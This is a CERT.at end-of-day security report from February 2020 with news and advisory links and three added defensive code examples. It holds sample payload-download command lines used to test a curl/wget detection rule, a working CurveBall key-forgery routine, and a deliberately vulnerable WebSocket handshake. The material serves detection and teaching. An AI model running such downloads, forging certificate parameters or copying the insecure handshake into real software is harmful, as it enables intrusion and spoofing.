End-of-Day report
Timeframe: Thursday 13-02-2020 18:00 - Friday 14-02-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Robert Waldner
News
Parallax RAT: Common Malware Payload After Hacker Forums Promotion
A remote access Trojan named Parallax is being widely distributed through malicious spam campaigns that when installed allow attackers to gain full control over an infected system.
https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/
Keep an Eye on Command-Line Browsers, (Fri, Feb 14th)
For a few weeks I have been searching for suspicious files that make use of a command-line browser like curl.exe or wget.exe in a Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type 'curl.exe' on your Windows 10 host: [...]
https://isc.sans.edu/diary/rss/25804
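The diary's point is that curl.exe and wget.exe are now ordinary Windows binaries, so a download by either is not suspicious on its own; the context is. The following is an added example (not code from the diary or from CERT.at) that runs a simple scoring rule over constructed Sysmon-style process-creation events: it flags invocations of the two downloaders, raises the score when the command writes the fetched content to disk and when the parent is an Office application or a script host, and ignores everything else. The parent-process list and the score weights are heuristics chosen for this example, not something the diary specifies.

```python
import re
from dataclasses import dataclass, field

# Constructed sample events (not real telemetry): process-creation records in the
# shape of Sysmon Event ID 1, reduced to the three fields the rule needs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\Public\update.exe http://198.51.100.23/update.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\wget.exe",
     "CommandLine": r"wget.exe --quiet -O %TEMP%\payload.dll https://203.0.113.5/p.dll",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -I https://www.example.com/",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

DOWNLOADERS = {"curl.exe", "wget.exe"}
# curl: -o <file>, -O (remote name), --output; wget: -O / --output-document
OUTPUT_FLAGS = {"-o", "-O", "--output", "--output-document"}
# Heuristic chosen for this example: parents from which a command-line browser is
# rarely launched legitimately.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "powershell.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
RAW_IP_RE = re.compile(r"^(?:https?|ftp)://\d{1,3}(?:\.\d{1,3}){3}", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    image: str
    parent: str
    urls: list = field(default_factory=list)
    writes_file: bool = False
    score: int = 0


def evaluate(event: dict):
    """Return a Finding for curl.exe/wget.exe launches, None for anything else."""
    image = basename(event["Image"])
    if image not in DOWNLOADERS:
        return None
    cmdline = event["CommandLine"]
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)          # keep quoted paths whole
    urls = URL_RE.findall(cmdline)
    writes_file = any(t in OUTPUT_FLAGS or t.startswith("--output") for t in tokens)
    parent = basename(event["ParentImage"])

    score = 1                                              # downloader seen at all
    if writes_file:
        score += 2                                         # content lands on disk
    if parent in SUSPICIOUS_PARENTS:
        score += 3                                         # spawned by Office/script host
    if urls and RAW_IP_RE.match(urls[0]):
        score += 1                                         # fetched from a bare IP
    return Finding(image, parent, urls, writes_file, score)


def scan(events, threshold: int = 3):
    """All events scoring at or above the threshold, in input order."""
    return [f for f in map(evaluate, events) if f is not None and f.score >= threshold]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The header-only request to www.example.com scores 1 and stays below the threshold, while the two Office/script-host launched downloads to disk from bare IP addresses score 7; tune the weights and the parent list to your own environment's baseline before alerting on them.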
LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File
Recently, we discovered LokiBot (detected by Trend Micro as Trojan.Win32.LOKI) impersonating a popular game launcher to trick users into executing it on their machines. Further analysis revealed that a sample of this variant employs a quirky installation routine that involves dropping a compiled C# code file.
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/WsiHoe_u7N4/
An In-Depth Technical Analysis of CurveBall (CVE-2020-0601)
The first Microsoft Patch Tuesday of 2020 contained fixes for CVE-2020-0601 [...] an attacker exploiting this vulnerability could potentially create their own cryptographic certificates that appear to originate from a legitimate certificate that is fully trusted by Windows by default. [...] This post will primarily highlight the code-level root cause analysis of the vulnerability in the context of how applications are likely to use CryptoAPI to handle certificates, more specifically in the [...]
https://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-technical-analysis-of-curveball-cve-2020-0601/
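The excerpt above does not spell out the mechanism, so here is the arithmetic behind CurveBall as an added example (not code from the Trend Micro post or from Microsoft). The publicly documented root cause is that CryptoAPI matched a certificate against a cached trusted root by its public-key point but did not check the explicit elliptic-curve parameters the certificate carried, in particular the generator. An attacker who knows the trusted key Q picks any private key d' and publishes the generator G' = d'^-1 * Q; then d' * G' == Q, the key "matches", and the attacker can sign with d'. The code below implements P-256 arithmetic from scratch (the curve constants are the standard NIST values) and shows the forged parameters passing a point-only comparison and failing once the parameters are compared too. The function names and the two matcher functions are this example's own.

```python
import secrets

# NIST P-256 domain parameters (standard values).
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (GX, GY)
INF = None  # point at infinity


def on_curve(pt) -> bool:
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def add(p1, p2):
    """Affine point addition on y^2 = x^3 + Ax + B over GF(P)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:      # p1 == -p2 (covers doubling with y == 0)
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def mul(k: int, pt):
    """Double-and-add scalar multiplication k * pt."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = add(result, addend)
        addend = add(addend, addend)
        k >>= 1
    return result


def forge_parameters(trusted_pubkey, attacker_priv: int) -> dict:
    """Explicit curve parameters whose generator satisfies attacker_priv * G' == trusted_pubkey.
    Only the generator differs from the standard parameters; the attacker knows d' and G'."""
    g_prime = mul(pow(attacker_priv, -1, N), trusted_pubkey)
    return {"p": P, "a": A, "b": B, "G": g_prime, "n": N}


STANDARD_PARAMS = {"p": P, "a": A, "b": B, "G": G, "n": N}


def vulnerable_matches_trusted(cert_pubkey, cert_params, trusted_pubkey) -> bool:
    """Pre-patch style check: the public-key point alone decides the match."""
    return cert_pubkey == trusted_pubkey


def fixed_matches_trusted(cert_pubkey, cert_params, trusted_pubkey) -> bool:
    """Patched style check: the certificate's parameters must equal the trusted key's."""
    return cert_pubkey == trusted_pubkey and cert_params == STANDARD_PARAMS


def demo():
    """Returns (forged key equals CA key, vulnerable check passes, fixed check passes)."""
    d_ca = secrets.randbelow(N - 1) + 1          # the CA's secret, unknown to the attacker
    q_ca = mul(d_ca, G)                          # the CA's public key, in every trust store
    d_attacker = secrets.randbelow(N - 1) + 1    # any key the attacker chooses
    params = forge_parameters(q_ca, d_attacker)
    q_forged = mul(d_attacker, params["G"])      # what the forged certificate carries
    return (q_forged == q_ca,
            vulnerable_matches_trusted(q_forged, params, q_ca),
            fixed_matches_trusted(q_forged, params, q_ca))


if __name__ == "__main__":
    print(demo())
```

The forged generator is a perfectly valid point on P-256 (on_curve returns True for it), which is why a validator that only checks "is this key on the right curve" or "does this key equal a cached trusted key" is not enough; either the explicit parameters must be compared against the named curve or certificates with explicit parameters must be rejected outright.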
SweynTooth vulnerability collection: SoCs in numerous products vulnerable
Twelve flaws in the Bluetooth Low Energy implementation on systems-on-chip from several manufacturers affect wearables, IoT devices and probably also medical devices.
https://heise.de/-4660872
Vulnerabilities
Trend Micro AntiVirus: vulnerability allows denial of service
Trend Micro AntiVirus is anti-virus software.
Trend Micro Maximum Security is a desktop security suite.
Trend Micro Internet Security is a firewall and antivirus solution.
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/02/warnmeldung_tw-t20-0031.html
Schneider Electric Modicon Ethernet Serial RTU
This advisory contains mitigations for improper check for unusual or exceptional conditions and improper access control vulnerabilities in Schneider Electric's Modicon BMXNOR0200H Ethernet Serial RTU, a remote terminal unit.
https://www.us-cert.gov/ics/advisories/icsa-20-044-01
Schneider Electric Magelis HMI Panels
This advisory contains mitigations for an improper check for unusual or exceptional conditions vulnerability in Schneider Electric's Magelis HMI Panels.
https://www.us-cert.gov/ics/advisories/icsa-20-044-02
FortiManager Cross-Site WebSocket Hijacking (CSWSH)
An Insufficient Verification of Data Authenticity vulnerability in FortiManager may allow an unauthenticated attacker to perform a Cross-Site WebSocket Hijacking (CSWSH) attack. Affected: FortiManager 6.2.0 to 6.2.1, and 6.0.6 and below.
https://fortiguard.com/psirt/FG-IR-19-191
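CSWSH is the WebSocket analogue of CSRF: a page on an attacker's origin opens a socket to the target, the browser attaches the victim's cookies, and if the server never looks at the Origin header the attacker gets a bidirectional, authenticated channel. The following is an added example of the vulnerability class in general (not FortiManager's code, and not a description of Fortinet's fix): a minimal handshake handler that accepts any well-formed Upgrade request, beside a hardened one that requires an allow-listed Origin and a per-session token the attacker's page cannot read. The two request samples, the host names and the token are constructed for this example; the Sec-WebSocket-Key/Accept pair is the RFC 6455 test vector.

```python
import base64
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # fixed by RFC 6455


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def accept_key(client_key: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)). This proves the peer speaks
    WebSocket; it says nothing about which web origin opened the connection."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def _is_upgrade(headers: dict) -> bool:
    return headers.get("upgrade", "").lower() == "websocket" and "sec-websocket-key" in headers


def _switching_protocols(headers: dict) -> str:
    return ("HTTP/1.1 101 Switching Protocols\r\n"
            "Upgrade: websocket\r\nConnection: Upgrade\r\n"
            f"Sec-WebSocket-Accept: {accept_key(headers['sec-websocket-key'])}\r\n\r\n")


def vulnerable_handshake(raw: str) -> str:
    """Authenticates by the session cookie alone; the Origin header is never examined,
    so a socket opened from any web page in the victim's browser is accepted."""
    _, headers = parse_request(raw)
    if not _is_upgrade(headers):
        return "HTTP/1.1 400 Bad Request\r\n\r\n"
    return _switching_protocols(headers)


def hardened_handshake(raw: str, allowed_origins: set, expected_token: str) -> str:
    """Requires an allow-listed Origin (browsers always set it, scripts cannot forge it)
    and a per-session token in the URL that a foreign origin cannot read."""
    request_line, headers = parse_request(raw)
    if not _is_upgrade(headers):
        return "HTTP/1.1 400 Bad Request\r\n\r\n"
    if headers.get("origin", "").lower() not in allowed_origins:
        return "HTTP/1.1 403 Forbidden\r\n\r\n"
    path = request_line.split(" ")[1]
    token = parse_qs(urlsplit(path).query).get("token", [None])[0]
    if token is None or not hmac.compare_digest(token, expected_token):
        return "HTTP/1.1 403 Forbidden\r\n\r\n"
    return _switching_protocols(headers)


def make_request(origin: str, token: str) -> str:
    """Constructed browser handshake; the cookie is attached by the browser in both cases."""
    return ("GET /ws?token=%s HTTP/1.1\r\n"
            "Host: manager.example.internal\r\n"
            "Upgrade: websocket\r\nConnection: Upgrade\r\n"
            "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
            "Sec-WebSocket-Version: 13\r\n"
            "Origin: %s\r\n"
            "Cookie: session=victim-session-cookie\r\n\r\n") % (token, origin)


ALLOWED_ORIGINS = {"https://manager.example.internal"}
SESSION_TOKEN = "s3cr3t-per-session"
LEGIT_REQUEST = make_request("https://manager.example.internal", SESSION_TOKEN)
HIJACK_REQUEST = make_request("https://attacker.example", "guess")   # attacker page, victim cookie

if __name__ == "__main__":
    print(vulnerable_handshake(HIJACK_REQUEST).split("\r\n")[0])
    print(hardened_handshake(HIJACK_REQUEST, ALLOWED_ORIGINS, SESSION_TOKEN).split("\r\n")[0])
```

The Origin check is the essential fix; the token is defence in depth for clients that do not send Origin. Note that a missing Origin header is rejected here rather than tolerated, since non-browser clients that legitimately omit it can authenticate with the token instead of a cookie.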
Security updates for Friday
Security updates have been issued by Debian (debian-security-support, postgresql-11, and postgresql-9.6), Fedora (cutter-re, firefox, php-horde-Horde-Data, radare2, and texlive-base), openSUSE (docker-runc), Oracle (kernel), Red Hat (sudo), and Ubuntu (firefox).
https://lwn.net/Articles/812494/
Bugtraq: [TZO-13-2020] - AVIRA Generic AV Bypass (ZIP GPFLAG)
http://www.securityfocus.com/archive/1/542223
Security Bulletin: Vulnerability affecting IBM Network Performance Insight (CVE-2019-12402)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-affecting-ibm-network-performance-insight-cve-2019-12402/
Security Bulletin: Vulnerability affecting IBM Network Performance Insight (CVE-2019-16335)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-affecting-ibm-network-performance-insight-cve-2019-16335/
Security Bulletin: Oct 2019 : Multiple vulnerabilities in IBM Java Runtime affect CICS Transaction Gateway
https://www.ibm.com/blogs/psirt/security-bulletin-oct-2019-multiple-vulnerabilities-in-ibm-java-runtime-affect-cics-transaction-gateway/
Security Bulletin: OpenSSL vulnerability affects IBM Rational Team Concert
https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerability-affects-ibm-rational-team-concert-2/
Security Bulletin: Oracle Outside In Technology vulnerability in Rational DOORS Next Generation
https://www.ibm.com/blogs/psirt/security-bulletin-oracle-outside-in-technology-vulnerability-in-rational-doors-next-generation/
Security Bulletin: Vulnerabilities affect IBM Network Performance Insight (CVE-2019-14379, CVE-2019-17531, CVE-2019-14439 and CVE-2019-14540)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-affect-ibm-network-performance-insight-cve-2019-14379-cve-2019-17531-cve-2019-14439-and-cve-2019-14540/
Security Bulletin: Vulnerability in IBM Java Runtime affect Financial Transaction Manager for Digital Payments
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java-runtime-affect-financial-transaction-manager-for-digital-payments/
Red Hat Virtualization: vulnerability allows cross-site scripting
http://www.cert-bund.de/advisoryshort/CB-K20-0132